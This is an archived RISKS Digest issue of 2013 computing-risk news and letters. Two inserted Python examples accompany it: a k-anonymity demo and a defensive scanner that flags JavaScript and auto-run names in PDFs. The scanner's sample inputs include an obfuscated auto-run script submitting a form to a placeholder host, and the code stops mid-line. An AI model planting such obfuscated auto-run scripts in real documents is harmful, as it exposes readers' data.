Risks Digest 27.28
From: RISKS List Owner <risko () csl sri com>
Date: Fri, 17 May 2013 14:43:03 PDT

RISKS-LIST: Risks-Forum Digest  Friday 17 May 2013  Volume 27 : Issue 28

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
  <http://catless.ncl.ac.uk/Risks/27.28.html>
The current issue can be found at
  <http://www.csl.sri.com/users/risko/risks.txt>

  Contents:
In Malaysia, online election battles take a nasty turn (Lauren Weinstein)
Pilots communicate with ATC with text messages (Diomidis Spinellis)
Flight cancelations: risk of a required printout (Jared Gottlieb)
CPSR dissolution; Gary Chapman gets CPSR's Norbert Wiener Award
  (Doug Schuler)
Cyberattacks Against U.S. Corporations Are on the Rise (NYTimes)
In Hours, Thieves Took $45 Million in ATM Scheme (Marc Santoram)
Theft of an iPhone Sets Off a Cinematic High-Speed Chase (Michael Wilson
   via Monty Solomon)
"Android threats growing in number and complexity, report says"
  (Lucian Constantin)
Privacy Breach on Bloomberg's Data Terminals (Chozick/Protess via
  Gene Wirchenko)
"Microsoft Warns of Facebook Hijack via Browser Plugin" (Chris Paoli)
"Microsoft admits zero-day bug in IE8, pledges patch" (Gregg Keizer via
  Gene Wirchenko)
Schnucks supermarkets credit card data hacked & exposed (Paul Robinson)
Man Messages Entire Internet (Chris J Brady)
Woman uses Facebook to `stalk' herself and try to frame ex-boyfriend
  (Lauren Weinstein)
Name.com security breach: passwords reset; e-mail, credit info ...
  (Lauren Weinstein)
How unique are you? (Martyn Thomas)
More info about that recent bank/ATM international scam (Danny Burstein)
"Exploiting a Bug in Google's Glass" (Gene Wirchenko)
Google Glass Picks Up Early Signal: Keep Out (David Streitfeld via
  Monty Solomon)
Re: Economic policy decisions may be affected by spreadsheet errors
  (Don Hacherl, Dennis F. Hamilton, Chris Drewe)
Re: McAfee spots Adobe Reader PDF-tracking flaw (Henry Baker)
Re: LAX sign story just gets better and better... (Anthony Thorn,
  Eric Ferguson)
Abridged info on RISKS (comp.risks)

----------------------------------------------------------------------

Date: Sat, 4 May 2013 19:22:52 -0700
From: Lauren Weinstein <lauren () vortex com>
Subject: In Malaysia, online election battles take a nasty turn

  Ahead of Malaysia's elections on Sunday, independent online media say
  they are being targeted in Internet attacks which filter content and
  throttle access to websites, threatening to deprive voters of their main
  source of independent reporting.  http://j.mp/17EJvfJ (Reuters via NNSquad)

------------------------------

Date: Thu, 16 May 2013 17:56:10 +0300
From: Diomidis Spinellis <dds () aueb gr>
Subject: Pilots communicate with ATC with text messages

The *Wall Street Journal* (16 May 2013) ran an article on systems that
allow pilots and air traffic controllers to communicate via text messages
[1].  The article claims that the system can increase the communication's
accuracy and the ATC's productivity.  It also has a pilot lauding the
system's accuracy and speed.

All these benefits sound probable.  However, the risks of the new technology
seem to get a short shrift.  I was struck by the following phrase:
"Controllers have pop-up windows with various choices of standard messages
for altitude changes, frequency changes and some re-routings."  What could
possibly go wrong?

[1]
http://online.wsj.com/article/SB10001424127887324767004578485061565368992.html?mod=e2tw

Diomidis Spinellis - http://www.spinellis.gr

------------------------------

Date: Wed, 8 May 2013 16:55:28 -0600
From: jared gottlieb <JARED () netspace net au>
Subject: Flight cancelations: risk of a required printout

Aviation Week & Space Technology reports that an American Airlines official
attributed a facet of the problem in the 16 April 2013 flight cancellations
to an inability to print out flight plans.

The airline's internal Flight Operations System (FOS) in Dallas crashed on
Tuesday afternoon, stranding the airline's entire domestic and international
route structure, estimated to last until 5 p.m. central time.

At issue in part is the inability for pilots to print out their flight
plans, a legacy process that requires a dot-matrix printer and 19 ft. of
paper at the gate for each flight.

 (http://www.aviationweek.com/Article.aspx?id=/article-xml/awx_04_16_2013_p0-569921.xml)

------------------------------

Date: May 7, 2013 9:49:57 PM EDT
From: Doug Schuler <douglas () publicsphereproject org>
Subject: CPSR dissolution; Gary Chapman gets CPSR's Norbert Wiener Award

  [We infrequently run an obit notice, but I don't recall ever running one
  for an organization.  However, if organizations are people, then this does
  not really set a new precedent.  Incidentally, CPSR was mentioned twice in
  the very first issue of RISKS in 1985, and Gary Chapman contributed to
  RISKS-1.37 and 1.46, as then director of CPSR.  Created by Severo
  Ornstein, and subsequently led by Gary and Marc Rotenberg, CPSR was a
  major player in activities related to RISKS, as Doug notes here.
  Posthumously giving the final Norbert Wiener Award to Gary is very
  fitting.  I hope the CPSR website can survive (cpsr.org) as an
  historically relevant site.  PGN]

It is my unenviable task to announce that Computer Professionals for Social
Responsibility (CPSR), a non-profit educational corporation, has been
dissolved.

CPSR was launched in 1981 in Palo Alto, California, to question the
computerization of war in the United States via the Strategic Computing
Initiative to use artificial intelligence in war, and, soon after, the
Strategic Defense Initiative -- `Star Wars'.  Over the years CPSR evolved
into a `big tent' organization that addressed a variety of computer-related
areas including workplace issues, privacy, participatory design, freedom of
information, community networks, and many others.

Now, of course, there are hundreds, if not thousands, of organizations and
movements that are concerned not only about the misuses of ICT by
governments and corporations (and others) but also about trying to develop
approaches that help communities work together to address issues related to
economic and other inequalities and environmental degradation -- as well as
broader issues such as war and peace.

CPSR to me provided a vital link to important ideas and to inspirational
and creative people. These people believed that positive social change was
possible and that the use of ICT could play a significant role. For
example, in 1993, CPSR developed a document designed to help shape the
National Information Infrastructure (NII) program promoted by the
Clinton/Gore administration to help guide the evolution of networked
digital communication. Through a variety of conferences, workshops and
reports, CPSR encouraged conversations about computers and society that
went beyond hyperbole and conventional wisdom.

Although in many ways the issues that CPSR helped publicize have changed
forms they generally still remain. The ethical and other issues surrounding
the computerization of war, for one thing, have not gone away just because
they're not prominent on the public agenda. CPSR's original focus on the
use of artificial intelligence in `battle management', etc. and the
possibility of launch on warning is probably still pertinent. The advent of
ubiquitous and inexpensive drones definitely is.

Apparently, as many people know, the age of the participatory membership
organizations is over -- their numbers are certainly way down -- and we in
CPSR had certainly noticed that trend. I personally suspect that this
development is not necessarily a good thing. I certainly would welcome
another membership organization with CPSR's Big Tent orientation.

On the occasion of CPSR's dissolution we've developed two small projects for
keeping CPSR's spirit alive.

The first is that it would be a good opportunity to catalog the groups and
organizations around the world that would be natural allies to CPSR if it
still existed. We've started this cataloging (see
http://www.publicsphereproject.org/civic_organizations) but presumably have
only captured a small fraction of these organizations. Please open an
account on the Public Sphere Project site and add the information about your
organization.

The second is less concrete but probably no less important. To help the
current and future generation of activists as we envision possible futures
and interventions, we'd like to put these two related questions forward:
What applications of ICT are the most important to human development and
sustainability? And, on the other hand, What are the strongest challenges to
these applications? Please e-mail me your thoughts on this and I will do my
best to compile the thoughts and make them public.

 - - - -

With this note I also want to announce that CPSR's final Norbert Wiener
Award for Social and Professional Responsibility winner is Gary Chapman,
who served as CPSR's first executive director from 1985 to 1992. The award
recognizes outstanding contributions for social responsibility in computing
technology. Named for Norbert Wiener (1894-1964), who, in addition to a
long and active scientific career that brought the word "cybernetics" (and,
hence, cyberspace) into the language, was also a leader in assessing the
social implications of computerization. Writing in Science (1960) Wiener
reminds us that, ``...even when the individual believes that science
contributes to the human ends which he has at heart, his belief needs a
continual scanning and re-evaluation which is only partly possible. For the
individual scientist, even the partial appraisal of the liaison between the
man and the historical process requires an imaginative forward glance at
history which is difficult, exacting, and only limitedly achievable...We
must always exert the full strength of our imagination.''

Gary (who died in 2010), spent nearly three decades working towards peace
and social justice as it related to information technology. As Marc
Rotenberg of the Electronic Privacy and Information Center (EPIC) stated,
Gary ``made many people stop and ask hard questions about technology. Not
just Is it cool?, but Does it make our lives better, or more just?
And does it make our world more secure?''

Gary's technology column, "Digital Nation," was carried in over 200
newspapers and websites. He taught and lectured all over the world, most
recently as a guest faculty member at the University of Porto in Porto,
Portugal. Since his time at CPSR he had been involved in a multitude of
related projects including the International School for Digital
Transformation (ISDT) that he and others at the University of Texas convened
annually in Porto, Portugal.

Gary was on the faculty of the Lyndon B. Johnson School of Public Affairs at
the University of Texas, Austin. On the local level, he also worked to
bridge the digital divide, the gulf between those with access to technology
and those without. In 1995, for example, he worked on the successful grant
application that led to the establishment of Austin Free-Net
(www.austinfree.net), which installed the first public access Internet
stations in Austin, and continues today as a national model for bringing
digital opportunities to low-income and digitally challenged residents. And
in 2010, Gary co-founded Big Gig Austin (www.biggigaustin.org), which
anchored the successful community campaign to bring the Google gigabit fiber
network to Austin.

Gary was a principled and untiring advocate for the use of the Internet as a
tool for collaboration and other means to bring people together. Also, as a
former medic with the Army Special Forces, Gary was especially concerned
about the uses of computing in warfare. In his articles in the CPSR
Newsletter, he warned that ``Automating our ignorance of how to cope with
war will produce only more disaster.''  With David Bellin he co-edited
Computers in Battle: Will They Work?, a book on the implications of computer
technology in war, and was involved for many years in a rich collaboration
with the Pugwash-USPID (Unione Scienziati Per Il Disarmo)-ISODARCO
(International School on Disarmament and Research on Conflicts) community in
Italy and elsewhere.

Gary contributed chapters to several books that I was involved with. Most
recently, he contributed The Good Life, one of the patterns
(publicsphereproject.org/patterns/lv) in Liberating Voices, a book that I
wrote (with the help of 85 others). The verbiage from the pattern card
abridged from the full text reminds us of Gary's humane values, and serves
as an important challenge for all of us:

People who hope for a better world feel the need for a shared vision of the
"good life" that is flexible enough for innumerable individual
circumstances but comprehensive enough to unite people in optimistic,
deliberate, progressive social change. This shared vision of The Good Life
should promote and sustain conviviality and solidarity among people, as
well as feelings of individual effectiveness, self-worth and purpose. A
shared vision of The Good Life is always adapting; it encompasses
suffering, loss and conflict as well as pleasures, reverence and common
goals of improvement. An emergent framework for the modern "good life" is
based on some form of humanism, particularly pragmatic or civic humanism,
with room for a spiritual dimension that does not seek domination. Finally,
the environmental crises of the planet require a broad vision of a "good
life" that can harmonize human aspirations with natural limits. All this
needs to be an ongoing and open-ended "conversation," best suited to small
geographic groups that can craft and then live an identity that reflects
their vision of a "good life."

Although this will be CPSR's final Wiener Award, the work that Gary and
other activists from CPSR and other organizations helped launch over two
decades ago is now being carried forward by scores of organizations and
thousands of activists all over the world, as digital information and
communication systems have assumed such a central location on the world's
stage.

Several projects including a Festschrift or other book project or event
related to CPSR and social responsibility have been discussed although no
firm plans have been made.

Gary Chapman was patient but persistent in his pursuit of progressive goals
and a better life for all. Sadly, Gary left us before he could see his
vision brought to fruition. He'll be missed but we all must push forward
with his vision.

Douglas Schuler <douglas () publicsphereproject org>

------------------------------

Date: Mon, 13 May 2013 10:05:37 PDT
From: "Peter G. Neumann" <neumann () csl sri com>
Subject: Cyberattacks Against U.S. Corporations Are on the Rise (NYTimes)

David E. Sanger, Nicole Perlroth, and Michael S. Schmidt [PGN-truncated]
http://www.nytimes.com/2013/05/13/us/cyberattacks-on-rise-against-us-corporations.html?pagewanted=1&hpw

A new wave of cyberattacks is striking American corporations, prompting
warnings from federal officials, including a vague one issued last week by
the Department of Homeland Security. This time, officials say, the
attackers' aim is not espionage but sabotage, and the source seems to be
somewhere in the Middle East.
<http://topics.nytimes.com/top/reference/timestopics/organizations/h/homeland_security_department/index.html?inline=nyt-org>.

The targets have primarily been energy companies, and the attacks appeared
to be probes, looking for ways to seize control of their processing systems.
The attacks are continuing, officials said.  But two senior administration
officials said Sunday that they were still not certain exactly where the
attacks were coming from, or whether they were state-sponsored or the work
of hackers or criminals. [...]

------------------------------

Date: Fri, 10 May 2013 01:21:41 -0400
From: Monty Solomon <monty () roscom com>
Subject: In Hours, Thieves Took $45 Million in ATM Scheme (Marc Santoram)

Marc Santoram, 9 May 2013

It was a brazen bank heist, but a 21st-century version in which the
criminals never wore ski masks, threatened a teller or set foot in a vault.
In two precision operations that involved people in more than two dozen
countries acting in close coordination and with surgical precision, thieves
stole $45 million from thousands of ATM's in a matter of hours.

In New York City alone, the thieves responsible for ATM withdrawals struck
2,904 machines over 10 hours starting on Feb. 19, withdrawing $2.4 million.
The operation included sophisticated computer experts operating in the
shadowy world of Internet hacking, manipulating financial information with
the stroke of a few keys, as well as common street criminals, who used that
information to loot the automated teller machines.  The first to be caught
was a street crew operating in New York, their pictures captured as,
prosecutors said, they traveled the city withdrawing money and stuffing
backpacks with cash. ...

http://www.nytimes.com/2013/05/10/nyregion/eight-charged-in-45-million-global-cyber-bank-thefts.html

------------------------------

Date: Mon, 6 May 2013 10:34:43 -0400
From: Monty Solomon <monty () roscom com>
Subject: Theft of an iPhone Sets Off a Cinematic High-Speed Chase
  (Michael Wilson)

Michael Wilson, *The New York Times*, 3 May 2013

The woman was talking on her iPhone, and never saw coming her induction into
a large and growing subset of crime victims. But there it happened shortly
after noon on April 15, on a busy corner of Main Street in Flushing, Queens.
A teenager zipped past, snatching the phone out of her hand and kept
running.

Devices like hers were stolen 16,000 times last year in New York City. But
what happened on this afternoon was anything but commonplace. The closest
comparison that leaps to mind is a classic chase scene from a 1971 thriller.

The teenager, soon out of sight, had every reason to believe his getaway was
whistle clean. The woman, with just as many reasons to believe that was the
last she would see of her phone, flagged a police officer, who put a call
over the radio with a description of the young man wearing a yellow hooded
sweatshirt. Another officer pulled out his own iPhone, and together with the
victim, logged into the Find My iPhone feature, which should work if the
thief had not turned the victim's phone off.

He had not. A telltale dot appeared on the screen of the officer's phone.
The victim's phone was nearby, at 126th Street and Roosevelt Avenue. ...

http://www.nytimes.com/2013/05/04/nyregion/crime-scene-chasing-down-a-gps-blip-to-a-stolen-iphone.html

------------------------------

Date: Fri, 17 May 2013 09:38:50 -0700
From: Gene Wirchenko <genew () telus net>
Subject: "Android threats growing in number and complexity, report says"
  (Lucian Constantin)

Lucian Constantin, InfoWorld Home, 14 May 2013
The Android threat landscape is starting to resemble that of Windows,
according to F-Secure's Mobile Threat Report

https://www.infoworld.com/d/mobile-technology/android-threats-growing-in-number-and-complexity-report-says-218523

------------------------------

Date: Wed, 15 May 2013 09:02:05 -0400
From: Monty Solomon <monty () roscom com>
Subject: Privacy Breach on Bloomberg's Data Terminals (Chozick/Protess)

Amy Chozick and Ben Protess, *The New York Times*, 10 May 2013
Privacy Breach on Bloomberg's Data Terminals

A shudder went through Wall Street on Friday after the revelation that
Bloomberg News reporters had extracted subscribers' private information
through the company's ubiquitous data terminals to break news.

The company confirmed that reporters at Bloomberg News, the journalism arm
of Bloomberg L.P., had for years used the company's terminals to monitor
when subscribers had logged onto the service and to find out what types of
functions, like the news wire, corporate bond trades or an equities index,
they had looked at. Bloomberg terminals, which cost an average of more than
$20,000 a year, are found in nearly every banking and trading company.

Bloomberg said the functions that allowed journalists to monitor subscribers
were a mistake and were promptly disabled after Goldman Sachs complained
that a Bloomberg reporter had, while inquiring about a partner's employment
status, pointed out that the partner had not logged onto his Bloomberg
terminal lately.

The incident led to broader concerns about the line at Bloomberg between its
lucrative terminal business and the hypercompetitive newsroom, threatening
to undermine the credibility of both. In a secretive world that thrives on
opacity, traders and financial firms jealously guard every speck of
information about their activity to avoid tipping their hand on their trades
and investments. ...

http://www.nytimes.com/2013/05/11/business/media/privacy-breach-on-bloombergs-data-terminals.html

------------------------------

Date: Wed, 15 May 2013 12:38:24 -0700
From: Gene Wirchenko <genew () telus net>
Subject: "Microsoft Warns of Facebook Hijack via Browser Plugin" (Chris Paoli)

Chris Paoli, Redmond Magazine, 14 May 2013
http://redmondmag.com/articles/2013/05/14/microsoft-warns-of-facebook-hijack.aspx

------------------------------

Date: Tue, 07 May 2013 11:56:23 -0700
From: Gene Wirchenko <genew () telus net>
Subject: "Microsoft admits zero-day bug in IE8, pledges patch" (Gregg Keizer)

Gregg Keizer, Computerworld, InfoWorld, 06 May 2013

Security experts suspect Chinese hackers are using the flaw to target
nuclear weapons researchers using IE8, the most widely used of Microsoft's
five supported browsers
http://www.infoworld.com/d/security/microsoft-admits-zero-day-bug-in-ie8-pledges-patch-217927

------------------------------

Date: Thu, 9 May 2013 09:35:56 -0700 (PDT)
From: Paul Robinson <paul () paul-robinson us>
Subject: Schnucks supermarkets credit card data hacked & exposed

Computerworld - For a few months earlier this year, the personal data of
customers of the Schnucks supermarket chain was exposed to hackers whose
work went undetected until after a card processing company issued an alert
about fraudulent activity on a handful of credit and debit cards used at the
stores.
http://www.computerworld.com/s/article/9238891
/Security_tools_can_t_keep_hackers_at_bay?source=IDGENTERPRISENLE_nlt_insider_2013-05-09

  [More like 'Schmucks']

------------------------------

Date: Sun, 5 May 2013 04:14:18 -0700 (PDT)
From: Chris J Brady <chrisjbrady () yahoo com>
Subject: Man Messages Entire Internet

http://metro.co.uk/2013/05/03/man-messages-the-entire-internet-the-internet-replies-i-am-easy-to-exploit-3710848/

Man messages the entire Internet.  The Internet replies: I am easy to
exploit.  While most of the world spent the past year just drifting through
life, he took that time to message every Internet-connected device on the
planet.  In order to carry out a survey that would examine the flaws which
make us vulnerable to cyber attacks, Moore messaged almost 4 billion Internet
Protocol (IP) addresses belonging to our devices, getting replies from 310m
of them.  The goal was to collate a mountain of data and then go through it
to determine what security flaws exist which leave individuals and
businesses exposed to online criminals.  According to the study, attackers
could potentially access company servers to gain individuals' personal
details. Other vulnerabilities could allow criminals to gain control of
certain infrastructure, from traffic lights to factories to oil pipelines.
``Off-hand, at least 100m devices are directly connected to the Internet and
expose a common security weakness.  The surprising part wasn't the type of
systems exposed, but the sheer number of them and the concentration of
vulnerable systems by geography and industry.''

------------------------------

Date: Sat, 4 May 2013 21:00:09 -0700
From: Lauren Weinstein <lauren () vortex com>
Subject: Woman uses Facebook to `stalk' herself and try to frame ex-boyfriend

  "A Comstock Park woman faces criminal charges after police say she
  admitted to creating false Facebook accounts with her ex-boyfriend's
  personal information to make it appear that his new girlfriend was
  threatening her."  http://j.mp/103pqNG (MLive via NNSquad)

------------------------------

Date: Wed, 8 May 2013 16:31:26 -0700
From: Lauren Weinstein <lauren () vortex com>
Subject: Name.com security breach: passwords reset; e-mail, credit info ...

  Internet registrar Name.com on Wednesday revealed it was hit by a security
  breach. The company sent an e-mail to its customers informing them that
  their usernames, e-mail addresses, passwords, and credit card account
  information "may have been accessed by unauthorized individuals."  The
  good news is that the last two were encrypted, according to Name.com's
  e-mail.  http://j.mp/11kBuxI  (TNW)

------------------------------

Date: Tue, 07 May 2013 14:58:13 +0100
From: Martyn Thomas <martyn () thomas-associates co uk>
Subject: How unique are you?

Many of the volunteers in the personal genome project also volunteered their
5-digit zip codes, gender and date of birth, which made it easy to
re-identify them. The data privacy lab has set up a web page
http://aboutmyinfo.org/ so that US residents can see how many other people
have the same details as their own.
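
As an added illustration of the re-identification risk this post describes
(not code from the post, from the Data Privacy Lab, or from aboutmyinfo.org),
the following Python measures how many records in a small constructed
dataset share the same 5-digit ZIP, gender and date of birth, i.e. the
k-anonymity of the release with respect to those quasi-identifiers. It goes
one step beyond the post by showing the two standard mitigations, generalizing
the quasi-identifiers (ZIP3 and birth year instead of ZIP5 and full date) and
suppressing records whose equivalence class is still smaller than k. All
records are made up for the example; the function and variable names are the
example's own.

```python
from collections import Counter

# Constructed sample records for illustration only: (zip5, gender, date of birth).
# These are not real people and not Personal Genome Project data.
SAMPLE_RECORDS = [
    ("02139", "F", "1975-03-14"),
    ("02139", "F", "1975-03-14"),  # shares all three quasi-identifiers with the row above
    ("02139", "M", "1975-03-14"),
    ("02142", "F", "1980-11-02"),
    ("02142", "F", "1980-11-23"),
    ("02142", "M", "1980-11-23"),
    ("94301", "M", "1962-07-09"),
    ("94301", "M", "1962-07-09"),
    ("94301", "M", "1962-07-09"),
    ("94306", "F", "1990-01-30"),
]


def identity(record):
    """Default key: use the full (zip5, gender, dob) tuple as the quasi-identifier."""
    return record


def equivalence_class_sizes(records, key=identity):
    """For each record, the number of records sharing its quasi-identifier tuple
    (the size of its equivalence class)."""
    counts = Counter(key(r) for r in records)
    return [counts[key(r)] for r in records]


def k_anonymity(records, key=identity):
    """The release is k-anonymous for k = smallest equivalence class; k == 1 means
    at least one person is uniquely identified by the quasi-identifiers alone."""
    sizes = equivalence_class_sizes(records, key)
    return min(sizes) if sizes else 0


def unique_fraction(records, key=identity):
    """Fraction of records that are the only member of their equivalence class."""
    sizes = equivalence_class_sizes(records, key)
    return sum(1 for s in sizes if s == 1) / len(sizes) if sizes else 0.0


def generalize(record):
    """Generalization: keep only the first three ZIP digits and the birth year."""
    zip5, gender, dob = record
    return (zip5[:3], gender, dob[:4])


def suppress_small_classes(records, k, key=identity):
    """Suppression: drop records whose class (under `key`) has fewer than k members,
    so what remains is k-anonymous with respect to `key`."""
    counts = Counter(key(r) for r in records)
    return [r for r in records if counts[key(r)] >= k]


if __name__ == "__main__":
    print("raw        k =", k_anonymity(SAMPLE_RECORDS),
          "unique =", unique_fraction(SAMPLE_RECORDS))
    print("generalized k =", k_anonymity(SAMPLE_RECORDS, key=generalize),
          "unique =", unique_fraction(SAMPLE_RECORDS, key=generalize))
    released = suppress_small_classes(SAMPLE_RECORDS, 2, key=generalize)
    print("generalized + suppressed: kept", len(released), "of", len(SAMPLE_RECORDS),
          "records, k =", k_anonymity(released, key=generalize))
```

On the constructed data, half the records are unique under the full
quasi-identifiers, generalization alone still leaves k = 1, and only
generalization plus suppression of the remaining singletons yields a
2-anonymous release, which is the trade-off (data utility versus
re-identifiability) that a service such as the one linked above is
letting individuals inspect for their own details.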

------------------------------

Date: Fri, 10 May 2013 17:53:23 -0400 (EDT)
From: danny burstein <dannyb () panix com>
Subject: More info about that recent bank/ATM international scam

[DOJ press release]

"These defendants allegedly formed the New York-based cell of an
international cybercrime organization that used sophisticated intrusion
techniques to hack into the systems of global financial institutions, steal
prepaid debit card data, and eliminate withdrawal limits." ... "The
"Unlimited Operation" begins when the cybercrime organization hacks into the
computer systems of a credit card processor, compromises prepaid debit card
accounts, and essentially eliminates the withdrawal limits and account
balances of those accounts. The elimination of withdrawal limits enables the
participants to withdraw literally unlimited amounts of cash until the
operation is shut down."

rest:
http://www.justice.gov/usao/nye/pr/2013/2013may09.html

------------------------------

Date: Mon, 06 May 2013 10:46:12 -0700
From: Gene Wirchenko <genew () telus net>
Subject: "Exploiting a Bug in Google's Glass"

  [Google Glass has been hacked.]

http://www.saurik.com/id/16
Exploiting a Bug in Google's Glass

------------------------------

Date: Tue, 7 May 2013 06:48:37 -0400
From: Monty Solomon <monty () roscom com>
Subject: Google Glass Picks Up Early Signal: Keep Out (David Streitfeld)

David Streitfeld, *The New York Times*, May 6, 2013

SAN FRANCISCO - Google's wearable computer, the most anticipated piece of
electronic wizardry since the iPad and iPhone, will not go on sale for many
months.  But the resistance is already under way.

The glasseslike device, which allows users to access the Internet, take
photos and film short snippets, has been preemptively banned by a Seattle
bar. Large parts of Las Vegas will not welcome wearers.  West Virginia
legislators tried to make it illegal to use the gadget, known as Google
Glass, while driving. ...

http://www.nytimes.com/2013/05/07/technology/personaltech/google-glass-picks-up-early-signal-keep-out.html

------------------------------

Date: Mon, 6 May 2013 09:13:51 -0700
From: "Don Hacherl" <don () hacherl org>
Subject: Re: Economic policy decisions may be affected by spreadsheet errors
  (Shapir, RISKS-27.27)

In RISKS-27.26 and 27.27, Amos Shapir states that Microsoft's failure to
provide symbolic naming in Excel is the root cause of Reinhart and Rogoff's
errors ("I'm not surprised that Microsoft would force such antediluvian
practices upon all of us", "Leaving Excel in this primitive state is
certainly MS's fault."), as well as a host of other evils.  However, this
accusation is clearly erroneous, as Excel supports "named references" and
"named ranges", and has done so for at least a decade (I don't have Excel
documentation handy for versions prior to 2003).

Perhaps the RISK here is the temptation to blame familiar bogeymen for what
you assume their shortcomings must be without bothering to check whether or
not those shortcomings exist.

  [Also noted by James Geissman.  PGN]

------------------------------

Date: Sun, 5 May 2013 08:22:57 -0700
From: "Dennis E. Hamilton" <dennis.hamilton () acm org>
Subject: Re: Economic policy decisions may be affected by spreadsheet errors
  (Shapir and Kohne, RISKS-27.27)

"Define Name"

The mouse-over explanation is,

"Name cells so that you can refer to them in formulas by that name.
...
"Names can be used in formulas to make them easier to understand."

That the binding is to a specific cell is also significant (and can be fixed
or floating to follow the cell when its coordinates change as the result of
other actions).  I don't have any older version of Excel installed at the
moment, but I would be surprised if this feature does not exist in the
still-popular Excel 2003.

It seems that, in this case, Kohne's observations about folks lacking a
combination of subject-matter expertise and fluency with chosen digital
tools is more compelling than dwelling on the absence of features that are
actually present.

I have no recipe for increasing the empowerment of individuals to master
their handy tools.  It is at least as challenging as encouraging safe
password practices and explaining two-factor authentication to those who
think multiplicity of the same factor accomplishes anything.  [I deal
reluctantly with an institution that requires me to choose a safe *user* ID
(8-to-16 mixed character types) and obscures the entry field of my own ID,
while only providing a numeric passcode of not more than 8 digits [;<).]

PS: I just looked at a handy guide, "Microsoft Office Professional 2013
Plain & Simple" an overview of the current version that is probably most
useful for those with some fluency with earlier versions.  I see in Chapter
13, Analyzing Your Excel 2013 Data, that the "Define Name" feature is
clearly visible in the illustrative screen captures. The author provides
some nice tips.  Naming cells is not one of them.

PPS: In an alternative, open-source spreadsheet implementation, I found
similar capability after working down the Insert | Names ... | Define menu
selection, reaching a dialog titled "Define Name" with brief description
"Define the name and range or formula expression."

------------------------------

Date: Sat, 11 May 2013 17:46:09 +0100
From: "Chris D." <e767pmk () yahoo co uk>
Subject: Re: Economic policy decisions may be affected by spreadsheet errors
  (RISKS-27.26)

This seems to be rather hard on Microsoft; if you just want to store and
manipulate alphanumeric data, then Excel is widely available and easy to
use.  In my very limited experience, with purpose-made database programs you
have to design the whole 'table' structure first, whereas with Excel you can
just enter data as you go along.  And as mentioned, Excel comes with the
Office package that everyone has, while Access, say, is a separate paid-for
program that you need a business case for, or at least it was where I
worked.  (The problem in RISKS 24.20 was Excel silently changing the format
of data already entered.)

------------------------------

Date: Sun, 05 May 2013 04:16:13 -0700
From: Henry Baker <hbaker1 () pipeline com>
Subject: Re: McAfee spots Adobe Reader PDF-tracking flaw (Wirchenko)

"McAfee suggests that Adobe Reader users disable JavaScript until a patch is
released."

The best advice: "Disable JavaScript in Adobe Reader _forever_", or better
still, find a pdf reader that doesn't even bother implementing JavaScript at
all.
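
A triage check that goes with this advice, added here as an editor's example
and not part of Henry Baker's message or of any product the page names: before
a PDF is opened at all, scan it for the names that make a reader execute
JavaScript (/JavaScript, /JS) and for the triggers that fire without a click
(/OpenAction, /AA). Two details matter in practice and the script handles
both: PDF allows #XX hex escapes inside names, so /J#61vaScript is the same
name as /JavaScript and must be decoded before matching, and the scripted
object is often inside a Flate-compressed stream, so those are inflated and
scanned as well. The sample PDFs are constructed inline for the test and are
not real documents; the function and variable names are this example's own.

```python
"""Pre-open triage: does a PDF carry JavaScript or auto-run triggers?

Heuristic scan of a PDF's raw bytes plus any zlib (FlateDecode) streams it
can inflate. It is not a PDF parser: encrypted files, multi-filter or
predictor-encoded streams and other encodings are not handled, so a "clean"
verdict is a weak signal while a hit is a strong one.
"""
import re
import zlib

# A PDF name is '/' followed by "regular" characters: anything except
# whitespace and the delimiters ( ) < > [ ] { } / %.  '#' is regular, which is
# how /J#61vaScript can spell /JavaScript.
_NAME_RE = re.compile(rb'/[^\x00\t\n\x0c\r ()<>\[\]{}/%]+')
_HEX_ESC_RE = re.compile(rb'#([0-9A-Fa-f]{2})')
# Stream bodies sit between "stream<EOL>" and "endstream"; the lookbehind keeps
# "endstream" from being re-matched as the start of a new stream.
_STREAM_RE = re.compile(rb'(?<!end)stream\r?\n(.*?)endstream', re.DOTALL)

SCRIPT_NAMES = {b'/JavaScript', b'/JS'}      # script execution
AUTORUN_NAMES = {b'/OpenAction', b'/AA'}     # runs on open / on an event


def decode_name(token: bytes) -> bytes:
    """Undo #XX escapes inside a name token: /J#61vaScript -> /JavaScript."""
    return _HEX_ESC_RE.sub(lambda m: bytes([int(m.group(1), 16)]), token)


def names_in(data: bytes) -> set:
    """All name tokens in a byte blob, with hex escapes decoded."""
    return {decode_name(t) for t in _NAME_RE.findall(data)}


def inflated_streams(data: bytes):
    """Yield the decompressed body of every stream zlib can inflate."""
    for m in _STREAM_RE.finditer(data):
        d = zlib.decompressobj()  # tolerates the EOL bytes after the data
        try:
            yield d.decompress(m.group(1))
        except zlib.error:
            continue  # not Flate-encoded (or damaged): skip it


def scan_pdf(data: bytes) -> dict:
    """Names of interest found in the raw file and in inflated streams."""
    found = names_in(data)
    for body in inflated_streams(data):
        found |= names_in(body)
    return {
        'javascript': sorted(n.decode() for n in found & SCRIPT_NAMES),
        'autorun': sorted(n.decode() for n in found & AUTORUN_NAMES),
    }


def verdict(data: bytes) -> str:
    r = scan_pdf(data)
    if r['javascript'] and r['autorun']:
        return 'javascript-autorun'   # script that runs without user action
    if r['javascript']:
        return 'javascript'
    if r['autorun']:
        return 'autorun-only'
    return 'clean'


# Constructed sample inputs (minimal PDF fragments, not real files).
BENIGN_PDF = (b'%PDF-1.4\n'
              b'1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n'
              b'2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n'
              b'3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n'
              b'trailer << /Root 1 0 R >>\n%%EOF\n')
JS_PDF = (b'%PDF-1.4\n'
          b'1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n'
          b"4 0 obj << /S /JavaScript /JS (app.alert('hi');) >> endobj\n")
OBFUSCATED_PDF = (b'%PDF-1.4\n'
                  b'1 0 obj << /Type /Catalog /OpenAction 4 0 R >> endobj\n'
                  b"4 0 obj << /S /J#61vaScript /J#53 "
                  b"(this.submitForm('http://example.invalid/');) >> endobj\n")
_JS_OBJ = b'<< /S /JavaScript /JS (app.alert("x")) >>'
_BLOB = zlib.compress(_JS_OBJ)
COMPRESSED_PDF = (b'%PDF-1.5\n5 0 obj << /Type /ObjStm /Filter /FlateDecode '
                  b'/Length ' + str(len(_BLOB)).encode() + b' >>\nstream\n'
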